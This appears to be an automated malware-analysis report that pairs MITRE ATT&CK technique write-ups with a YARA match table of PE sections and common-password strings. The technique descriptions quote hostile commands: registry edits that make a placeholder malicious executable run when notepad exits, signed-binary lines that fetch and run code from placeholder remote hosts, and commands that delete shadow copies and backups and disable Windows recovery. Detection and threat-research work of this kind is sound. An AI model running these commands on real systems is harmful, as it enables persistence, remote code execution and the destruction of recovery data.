t1166 Setuid and Setgid chmod ,ls -l When the setuid or setgid bits are set on Linux or macOS for an application, this means that the application will run with the privileges of the owning user or group respectively (Citation: setuid man page). Normally an application is run in the current user’s context, regardless of which user or group owns the application. There are instances where programs need to be executed in an elevated context to function properly, but the user running them doesn’t need the elevated privileges. Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications. These bits are indicated with an "s" instead of an "x" when viewing a file's attributes via ls -l. The chmod program can set these bits via bitmasking, chmod 4777 [file], or via shorthand naming, chmod u+s [file]. An adversary can take advantage of this to either do a shell escape or exploit a vulnerability in an application with the setuid or setgid bits to get code running in a different user’s context. Additionally, adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future (Citation: OSX Keydnap malware).
t1179 Hooking credenumeratea Windows processes often leverage application programming interface (API) functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions. Hooking involves redirecting calls to these functions and can be implemented via: * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs. (Citation: Microsoft Hook Overview) (Citation: Endgame Process Injection July 2017) * **Import address table (IAT) hooking**, which uses modifications to a process’s IAT, where pointers to imported API functions are stored. (Citation: Endgame Process Injection July 2017) (Citation: Adlice Software IAT Hooks Oct 2014) (Citation: MWRInfoSecurity Dynamic Hooking 2015) * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow. (Citation: Endgame Process Injection July 2017) (Citation: HighTech Bridge Inline Hooking Sept 2011) (Citation: MWRInfoSecurity Dynamic Hooking 2015) Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), adversaries may use hooking to load and execute malicious code within the context of another process, masking the execution while also allowing access to the process's memory and possibly elevated privileges. Installing hooking mechanisms may also provide Persistence via continuous invocation when the functions are called through normal use. Malicious hooking mechanisms may also capture API calls that include parameters that reveal user authentication credentials for Credential Access. (Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Hooking is commonly utilized by [Rootkit](https://attack.mitre.org/techniques/T1014)s to conceal files, processes, Registry keys, and other objects in order to hide malware and associated behaviors. (Citation: Symantec Windows Rootkits)
t1182 AppCert DLLs createprocessasuser Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager are loaded into every process that calls the ubiquitously used application programming interface (API) functions CreateProcess, CreateProcessAsUser, CreateProcessWithLoginW, CreateProcessWithTokenW, or WinExec. (Citation: Endgame Process Injection July 2017) Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), this value can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.
t1183 Image File Execution Options Injection debugger,globalflag Image File Execution Options (IFEO) enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., “C:\dbg\ntsd.exe -g notepad.exe”). (Citation: Microsoft Dev Blog IFEO Mar 2010) IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as Debugger values in the Registry under HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ where is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010) IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\. 
(Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) An example where the evil.exe process is started when notepad.exe exits: (Citation: Oddvar Moe IFEO APR 2018) * reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512 * reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1 * reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\temp\evil.exe" Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may be abused to obtain persistence and privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Endgame Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous invocation. Malware may also use IFEO for Defense Evasion by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)
t1187 Forced Authentication file: The Server Message Block (SMB) protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system. (Citation: Wikipedia Server Message Block) This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources. Web Distributed Authoring and Versioning (WebDAV) is typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443. (Citation: Didier Stevens WebDAV Traffic) (Citation: Microsoft Managing WebDAV Security) Adversaries may take advantage of this behavior to gain access to user account hashes through forced SMB authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)), or place a specially crafted file on navigation path for privileged accounts (e.g. .SCF file placed on desktop) or on a publicly accessible share to be accessed by victim(s). When the user's system accesses the untrusted resource it will attempt authentication and send information including the user's hashed credentials over SMB to the adversary controlled server. (Citation: GitHub Hashjacking) With access to the credential hash, an adversary can perform off-line [Brute Force](https://attack.mitre.org/techniques/T1110) cracking to gain access to plaintext credentials, or reuse it for [Pass the Hash](https://attack.mitre.org/techniques/T1075). (Citation: Cylance Redirect to SMB) There are several different ways this can occur. 
(Citation: Osanda Stealing NetNTLM Hashes) Some specifics from in-the-wild use include: * A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)). The document can include, for example, a request similar to file[:]//[remote address]/Normal.dotm to trigger the SMB request. (Citation: US-CERT APT Energy Oct 2017) * A modified .LNK or .SCF file with the icon filename pointing to an external reference such as \\[remote address]\pic.png that will force the system to load the resource when the icon is rendered to repeatedly gather credentials. (Citation: US-CERT APT Energy Oct 2017)
t1196 Control Panel Items \windows,control.exe Windows Control Panel items are utilities that allow users to view and adjust computer settings. Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013) For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel. (Citation: Microsoft Implementing CPL) Adversaries can use Control Panel items as execution payloads to execute arbitrary commands. Malicious Control Panel items can be delivered via [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) campaigns (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware. (Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension whitelisting.
t1216 Signed Script Proxy Execution cscript Scripts signed with trusted certificates can be used to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application whitelisting solutions that do not account for use of these scripts. PubPrn.vbs is signed by Microsoft and can be used to proxy execution from a remote site. (Citation: Enigma0x3 PubPrn Bypass) Example command: cscript C[:]\Windows\System32\Printing_Admin_Scripts\en-US\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png There are several other signed scripts that may be used in a similar manner. (Citation: GitHub Ultimate AppLocker Bypass List)
t1218 Signed Binary Proxy Execution msiexec.exe Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application whitelisting and signature validation on systems. This technique accounts for proxy execution methods that are not already accounted for within the existing techniques. ### Msiexec.exe Msiexec.exe is the command-line Windows utility for the Windows Installer. Adversaries may use msiexec.exe to launch malicious MSI files for code execution. An adversary may use it to launch local or network accessible MSI files.(Citation: LOLBAS Msiexec)(Citation: Rancor Unit42 June 2018)(Citation: TrendMicro Msiexec Feb 2018) Msiexec.exe may also be used to execute DLLs.(Citation: LOLBAS Msiexec) * msiexec.exe /q /i "C:\path\to\file.msi" * msiexec.exe /q /i http[:]//site[.]com/file.msi * msiexec.exe /y "C:\path\to\file.dll" ### Mavinject.exe Mavinject.exe is a Windows utility that allows for code execution. Mavinject can be used to input a DLL into a running process. (Citation: Twitter gN3mes1s Status Update MavInject32) * "C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe" <PID> /INJECTRUNNING <PATH DLL> * C:\Windows\system32\mavinject.exe <PID> /INJECTRUNNING <PATH DLL> ### SyncAppvPublishingServer.exe SyncAppvPublishingServer.exe can be used to run PowerShell scripts without executing powershell.exe. 
(Citation: Twitter monoxgas Status Update SyncAppvPublishingServer) ### Odbcconf.exe Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) The utility can be misused to execute functionality equivalent to [Regsvr32](https://attack.mitre.org/techniques/T1117) with the REGSVR option to execute a DLL.(Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017) * odbcconf.exe /S /A {REGSVR "C:\Users\Public\file.dll"} Several other binaries exist that may be used to perform similar behavior. (Citation: GitHub Ultimate AppLocker Bypass List)
t1222 File Permissions Modification attrib File permissions are commonly managed by discretionary access control lists (DACLs) specified by the file owner. File DACL implementation may vary by platform, but generally explicitly designate which users/groups can perform which actions (ex: read, write, execute, etc.). (Citation: Microsoft DACL May 2018) (Citation: Microsoft File Rights May 2018) (Citation: Unix File Permissions) Adversaries may modify file permissions/attributes to evade intended DACLs. (Citation: Hybrid Analysis Icacls1 June 2018) (Citation: Hybrid Analysis Icacls2 May 2018) Modifications may include changing specific access rights, which may require taking ownership of a file and/or elevated permissions such as Administrator/root depending on the file's existing permissions to enable malicious activity such as modifying, replacing, or deleting specific files. Specific file modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1015), [Logon Scripts](https://attack.mitre.org/techniques/T1037), or tainting/hijacking other instrumental binary/configuration files.
t1424 None /proc None
t1484 Group Policy Modification sysvol Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predictable network path \\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) Like other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain. Malicious GPO modifications can be used to implement [Scheduled Task](https://attack.mitre.org/techniques/T1053), [Disabling Security Tools](https://attack.mitre.org/techniques/T1089), [Remote File Copy](https://attack.mitre.org/techniques/T1105), [Create Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1035) and more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandiant M Trends 2016)(Citation: Microsoft Hacking Team Breach) Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.(Citation: Wald0 Guide to GPOs) Publicly available scripts such as New-GPOImmediateTask can be leveraged to automate the creation of a malicious [Scheduled Task](https://attack.mitre.org/techniques/T1053) by modifying GPO settings, in this case modifying <GPO_PATH>\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml.(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) In some cases an adversary might modify specific 
user rights like SeEnableDelegationPrivilege, set in <GPO_PATH>\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right)
t1489 Service Stop msexchangeis Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster) Adversaries may accomplish this by disabling individual services of high importance to an organization, such as MSExchangeIS, which will make Exchange content inaccessible (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services may not allow for modification of their data stores while running. Adversaries may stop services in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)
t1490 Inhibit System Recovery wmic,vssadmin,bcdedit Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) A number of native Windows utilities have been used by adversaries to disable or delete system recovery features: * vssadmin.exe can be used to delete all volume shadow copies on a system - vssadmin.exe delete shadows /all /quiet * [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - wmic shadowcopy delete * wbadmin.exe can be used to delete the Windows Backup Catalog - wbadmin.exe delete catalog -quiet * bcdedit.exe can be used to disable automatic Windows recovery features by modifying boot configuration data - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
t1497 Virtualization/Sandbox Evasion systembiosversion,vmware Adversaries may check for the presence of a virtual machine environment (VME) or sandbox to avoid potential detection of tools and activities. If the adversary detects a VME, they may alter their malware to conceal the core functions of the implant or disengage from the victim. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use several methods including [Security Software Discovery](https://attack.mitre.org/techniques/T1063) to accomplish [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) by searching for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) to help determine if it is an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within temporary sandboxes. (Citation: Unit 42 Pirpi July 2015) ### Virtual Machine Environment Artifacts Discovery Adversaries may use utilities such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1086), [Systeminfo](https://attack.mitre.org/software/S0096), and the [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, and/or the Registry. Adversaries may use [Scripting](https://attack.mitre.org/techniques/T1064) to combine these checks into one script and then have the program exit if it determines the system to be a virtual environment. Also, in applications like VMware, adversaries can use a special I/O port to send commands and receive output. Adversaries may also check the drive size. For example, this can be done using the Win32 DeviceIOControl function. 
Example VME Artifacts in the Registry(Citation: McAfee Virtual Jan 2017) * HKLM\SOFTWARE\Oracle\VirtualBox Guest Additions * HKLM\HARDWARE\Description\System\”SystemBiosVersion”;”VMWARE” * HKLM\HARDWARE\ACPI\DSDT\BOX_ Example VME files and DLLs on the system(Citation: McAfee Virtual Jan 2017) * WINDOWS\system32\drivers\vmmouse.sys * WINDOWS\system32\vboxhook.dll * Windows\system32\vboxdisp.dll Common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.(Citation: McAfee Virtual Jan 2017) ###User Activity Discovery### Adversaries may search for user activity on the host (e.g., browser history, cache, bookmarks, number of files in the home directories, etc.) for reassurance of an authentic environment. They might detect this type of information via user interaction and digital signatures. They may have malware check the speed and frequency of mouse clicks to determine if it’s a sandboxed environment.(Citation: Sans Virtual Jan 2016) Other methods may rely on specific user interaction with the system before the malicious code is activated. Examples include waiting for a document to close before activating a macro (Citation: Unit 42 Sofacy Nov 2018) and waiting for a user to double click on an embedded image to activate (Citation: FireEye FIN7 April 2017). ###Virtual Hardware Fingerprinting Discovery### Adversaries may check the fan and temperature of the system to gather evidence that can be indicative a virtual environment. An adversary may perform a CPU check using a WMI query $q = “Select * from Win32_Fan” Get-WmiObject -Query $q. If the results of the WMI query return more than zero elements, this might tell them that the machine is a physical one. (Citation: Unit 42 OilRig Sept 2018)
t1501 Systemd Service .service,/usr/lib/systemd/system Systemd services can be used to establish persistence on a Linux system. The systemd service manager is commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014)(Citation: Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible with the aforementioned init systems. Systemd utilizes configuration files known as service units to control how services boot and under what conditions. By default, these unit files are stored in the /etc/systemd/system and /usr/lib/systemd/system directories and have the file extension .service. Each service unit file may contain numerous directives that can execute system commands.
* ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands when a service is started manually by 'systemctl' or on system start if the service is set to automatically start.
* ExecReload directive covers when a service restarts.
* ExecStop and ExecStopPost directives cover when a service is stopped, including manually by 'systemctl'.
Adversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious commands at recurring intervals, such as at system boot.(Citation: Anomali Rocke March 2019)(Citation: gist Arch package compromise 10JUL2018)(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018) While adversaries typically require root privileges to create/modify service unit files in the /etc/systemd/system and /usr/lib/systemd/system directories, low privilege users can create/modify service unit files in directories such as ~/.config/systemd/user/ to achieve user-level persistence.(Citation: Rapid7 Service Persistence 22JUNE2016)

YARA:MATCHES

Count Offset Rule Pattern Parsed Condition
0 0x308 Control_Flow_Guard_Detecton_1 .00cfg None uint16(0) == 0x5a4d and uint32be(uint32(0x3c)) == 0x50450000 and (for any of them : ( $ in (0..1024) ))
5 0x268 0xf90d8 0x12ac84 0x12aca8 0x17ba08 0x1936d9 Data_Section_Detecton_1 .data None uint16(0) == 0x5a4d and uint32be(uint32(0x3c)) == 0x50450000 and (for any of them : ( $ in (0..1024) ))
0 0x2e0 section_added_by_new_Visual_Studio_14_0__Detecton_1 .gfids None uint16(0) == 0x5a4d and uint32be(uint32(0x3c)) == 0x50450000 and (for any of them : ( $ in (0..1024) ))
2 0x2b8 0x179cfa 0x193701 Initialized_Data_Section_Borland__Detecton_1 .idata None uint16(0) == 0x5a4d and uint32be(uint32(0x3c)) == 0x50450000 and (for any of them : ( $ in (0..1024) ))
0 0x290 Exception_Handling_Functions_Section_PDATA_records__Detecton_1 .pdata None uint16(0) == 0x5a4d and uint32be(uint32(0x3c)) == 0x50450000 and (for any of them : ( $ in (0..1024) ))
2 0x240 0xf90b0 0x17b9e0 Read_only_initialized_Data_Section_MS_and_Borland__Detecton_1 .rdata None uint16(0) == 0x5a4d and uint32be(uint32(0x3c)) == 0x50450000 and (for any of them : ( $ in (0..1024) ))
1 0x358 0x179d4a Relocations_Section_Detecton_1 .reloc None uint16(0) == 0x5a4d and uint32be(uint32(0x3c)) == 0x50450000 and (for any of them : ( $ in (0..1024) ))
4 0x330 0x133f8b 0x172708 0x179d22 0x17ba30 Resource_section_Detecton_1 .rsrc None uint16(0) == 0x5a4d and uint32be(uint32(0x3c)) == 0x50450000 and (for any of them : ( $ in (0..1024) ))
9 0x218 0xf9088 0x11ef5e 0x1227bf 0x1527f9 0x17b9b8 0x193689 0x1936b1 0x19e212 0x1a1c73 Code_Section_Detecton_2 .text None uint16(0) == 0x5a4d and uint32be(uint32(0x3c)) == 0x50450000 and (for any of them : ( $ in (0..1024) ))
4 0x2b9 0x12a4bd 0x12a4fa 0x179cfb 0x193702 Initialized_Data_Section_C_RunTime__Detecton_2 idata None uint16(0) == 0x5a4d and uint32be(uint32(0x3c)) == 0x50450000 and (for any of them : ( $ in (0..1024) ))
23 0x65200 0x66e01 0x66fd1 0xf8a35 0xf9fbc 0xf9fc6 0xfa005 0xfb747 0xfb751 0xfc4d6 0xfde5e 0x118645 0x11af97 0x11b07c 0x11b5df 0x11c341 0x11c35a 0x1429c0 0x147813 0x14bb76 0x150a27 0x19aaa9 0x19aab9 0x19daa6 Top1000Passwords 123456 None any of them
2 0x117e6d 0x117eb5 0x1464f3 Top1000Passwords 123456 None any of them
173 0xfa0b4 0xfa0d3 0xfa150 0xfa16c 0xfbd48 0xfce94 0xfd602 0xfe9cd 0xfec09 0x1025f1 0x106098 0x10611c 0x113e73 0x11bfe0 0x11e47d 0x11e6fc 0x123d8b 0x126aee 0x126b04 0x1272d1 0x129b2d 0x1326d7 0x1328b7 0x1328c2 0x132da5 0x141933 0x1435f3 0x144f38 0x144f6a 0x144f9b 0x1450f3 0x145d48 0x1462a0 0x146a84 0x1470bc 0x147e88 0x14839c 0x148e64 0x149492 0x14c0ac 0x14c6e5 0x14c71a 0x14cd40 0x14d147 0x14d4ba 0x14d6a3 0x14e310 0x14f08b 0x14f099 0x14f0c8 0x14f375 0x14f3a9 0x19f291 0x1a7fd3 0x1a7fe8 0x1a9a16 0x1aa991 0x1ab1e9 0xfa0b4 0xfa0d3 0xfa150 0xfa16c 0xfbd48 0xfce94 0xfd602 0xfe9cd 0xfec09 0x1025f1 0x106098 0x10611c 0x113e73 0x11bfe0 0x11e47d 0x11e6fc 0x123d8b 0x126aee 0x126b04 0x1272d1 0x129b2d 0x1326d7 0x1328b7 0x1328c2 0x132da5 0x141933 0x1435f3 0x144f38 0x144f6a 0x144f9b 0x1450f3 0x145d48 0x1462a0 0x146a84 0x1470bc 0x147e88 0x14839c 0x148e64 0x149492 0x14c0ac 0x14c6e5 0x14c71a 0x14cd40 0x14d147 0x14d4ba 0x14d6a3 0x14e310 0x14f08b 0x14f099 0x14f0c8 0x14f375 0x14f3a9 0x19f291 0x1a7fd3 0x1a7fe8 0x1a9a16 0x1aa991 0x1ab1e9 0xfa0b4 0xfa0d3 0xfa150 0xfa16c 0xfbd48 0xfce94 0xfd602 0xfe9cd 0xfec09 0x1025f1 0x106098 0x10611c 0x113e73 0x11bfe0 0x11e47d 0x11e6fc 0x123d8b 0x126aee 0x126b04 0x1272d1 0x129b2d 0x1326d7 0x1328b7 0x1328c2 0x132da5 0x141933 0x1435f3 0x144f38 0x144f6a 0x144f9b 0x1450f3 0x145d48 0x1462a0 0x146a84 0x1470bc 0x147e88 0x14839c 0x148e64 0x149492 0x14c0ac 0x14c6e5 0x14c71a 0x14cd40 0x14d147 0x14d4ba 0x14d6a3 0x14e310 0x14f08b 0x14f099 0x14f0c8 0x14f375 0x14f3a9 0x19f291 0x1a7fd3 0x1a7fe8 0x1a9a16 0x1aa991 0x1ab1e9 Top1000Passwords Password None any of them
230 0xfc036 0xfe956 0xfe9a2 0xfea05 0x102581 0x10552b 0x105542 0x1055a2 0x113c78 0x119edf 0x119f25 0x11bf65 0x11c306 0x120bb8 0x120f2e 0x127fb6 0x12e37f 0x132206 0x132265 0x1325ad 0x1327e4 0x13284f 0x13ad36 0x13ad47 0x13d6d8 0x13dcdf 0x1418f8 0x1433fa 0x14340e 0x144b20 0x145928 0x147ba7 0x147c6b 0x147f9c 0x147fff 0x149489 0x1498e8 0x149a0a 0x149c63 0x149cb6 0x14afef 0x14caea 0x14e590 0x14ec78 0x14f196 0x15125b 0x152827 0x152b83 0x152c67 0x198979 0x1989a8 0x199a66 0x199e25 0x19be5d 0x19c444 0x19c46e 0x19c67e 0x19f18b 0x19f1b9 0x1a0d7f 0x1a1649 0x1a3819 0x1a384d 0x1a4777 0x1a4797 0x1a64f1 0x1a8c74 0x1a8f31 0x1a8f43 0x1a8f53 0x1a93e1 0x1a9eee 0x1a9f20 0x1aa88b 0x1aa900 0x1aa9b0 0x1aa9c2 0xfc036 0xfe956 0xfe9a2 0xfea05 0x102581 0x10552b 0x105542 0x1055a2 0x113c78 0x119edf 0x119f25 0x11bf65 0x11c306 0x120bb8 0x120f2e 0x127fb6 0x12e37f 0x132206 0x132265 0x1325ad 0x1327e4 0x13284f 0x13ad36 0x13ad47 0x13d6d8 0x13dcdf 0x1418f8 0x1433fa 0x14340e 0x144b20 0x145928 0x147ba7 0x147c6b 0x147f9c 0x147fff 0x149489 0x1498e8 0x149a0a 0x149c63 0x149cb6 0x14afef 0x14caea 0x14e590 0x14ec78 0x14f196 0x15125b 0x152827 0x152b83 0x152c67 0x198979 0x1989a8 0x199a66 0x199e25 0x19be5d 0x19c444 0x19c46e 0x19c67e 0x19f18b 0x19f1b9 0x1a0d7f 0x1a1649 0x1a3819 0x1a384d 0x1a4777 0x1a4797 0x1a64f1 0x1a8c74 0x1a8f31 0x1a8f43 0x1a8f53 0x1a93e1 0x1a9eee 0x1a9f20 0x1aa88b 0x1aa900 0x1aa9b0 0x1aa9c2 0xfc036 0xfe956 0xfe9a2 0xfea05 0x102581 0x10552b 0x105542 0x1055a2 0x113c78 0x119edf 0x119f25 0x11bf65 0x11c306 0x120bb8 0x120f2e 0x127fb6 0x12e37f 0x132206 0x132265 0x1325ad 0x1327e4 0x13284f 0x13ad36 0x13ad47 0x13d6d8 0x13dcdf 0x1418f8 0x1433fa 0x14340e 0x144b20 0x145928 0x147ba7 0x147c6b 0x147f9c 0x147fff 0x149489 0x1498e8 0x149a0a 0x149c63 0x149cb6 0x14afef 0x14caea 0x14e590 0x14ec78 0x14f196 0x15125b 0x152827 0x152b83 0x152c67 0x198979 0x1989a8 0x199a66 0x199e25 0x19be5d 0x19c444 0x19c46e 0x19c67e 0x19f18b 0x19f1b9 0x1a0d7f 0x1a1649 0x1a3819 0x1a384d 0x1a4777 0x1a4797 0x1a64f1 0x1a8c74 0x1a8f31 0x1a8f43 
0x1a8f53 0x1a93e1 0x1a9eee 0x1a9f20 0x1aa88b 0x1aa900 0x1aa9b0 0x1aa9c2 Top1000Passwords password None any of them
14 0x115ac5 0x116b8f 0x1468fc 0x14e40d 0x14e43d 0x115ac5 0x116b8f 0x1468fc 0x14e40d 0x14e43d 0x115ac5 0x116b8f 0x1468fc 0x14e40d 0x14e43d Top1000Passwords password None any of them
5 0x116a95 0x144b8a 0x116a95 0x144b8a 0x116a95 0x144b8a Top1000Passwords PASSWORD None any of them
41 0x117348 0x125f69 0x1272bd 0x140516 0x144076 0x144c8c 0x145d2e 0x147cb0 0x147d1c 0x1486b8 0x149aa7 0x14f0dd 0x15cadc 0x1a5382 0x117348 0x125f69 0x1272bd 0x140516 0x144076 0x144c8c 0x145d2e 0x147cb0 0x147d1c 0x1486b8 0x149aa7 0x14f0dd 0x15cadc 0x1a5382 0x117348 0x125f69 0x1272bd 0x140516 0x144076 0x144c8c 0x145d2e 0x147cb0 0x147d1c 0x1486b8 0x149aa7 0x14f0dd 0x15cadc 0x1a5382 Top1000Passwords PASSWORD None any of them
5 0x118e1d 0x180328 0x118e1d 0x180328 0x118e1d 0x180328 Top1000Passwords Password None any of them
18 0x65200 0x66e01 0x66fd1 0xf8a35 0xf9fbc 0xfa005 0xfb747 0xfb751 0xfc4d6 0xfde5e 0x118645 0x11af97 0x11b07c 0x11b5df 0x11c341 0x11c35a 0x1429c0 0x19aaa9 0x19aab9 Top1000Passwords 12345678 None any of them
1 0x117e6d 0x117eb5 Top1000Passwords 12345678 None any of them
3 0x122b11 0x122c9c 0x122f8d 0x123bf5 Top1000Passwords Qwerty None any of them
2 0x123185 0x12328f 0x123397 Top1000Passwords Qwerty None any of them
0 0x123578 Top1000Passwords QWERTY None any of them
0 0x144300 Top1000Passwords QWERTY None any of them
16 0x65200 0x66e01 0x66fd1 0xf8a35 0xf9fbc 0xfa005 0xfb747 0xfb751 0xfde5e 0x118645 0x11af97 0x11b07c 0x11b5df 0x11c35a 0x1429c0 0x19aaa9 0x19aab9 Top1000Passwords 123456789 None any of them
1 0x117e6d 0x117eb5 Top1000Passwords 123456789 None any of them
24 0x65200 0x66e01 0x66fd1 0xf8a35 0xf9fbc 0xf9fc6 0xfa005 0xfb747 0xfb751 0xfc4d6 0xfde5e 0x118645 0x11af97 0x11b07c 0x11b5df 0x11c341 0x11c35a 0x11d6e7 0x1429c0 0x147813 0x14bb76 0x150a27 0x19aaa9 0x19aab9 0x19daa6 Top1000Passwords 12345 None any of them
2 0x117e6d 0x117eb5 0x1464f3 Top1000Passwords 12345 None any of them
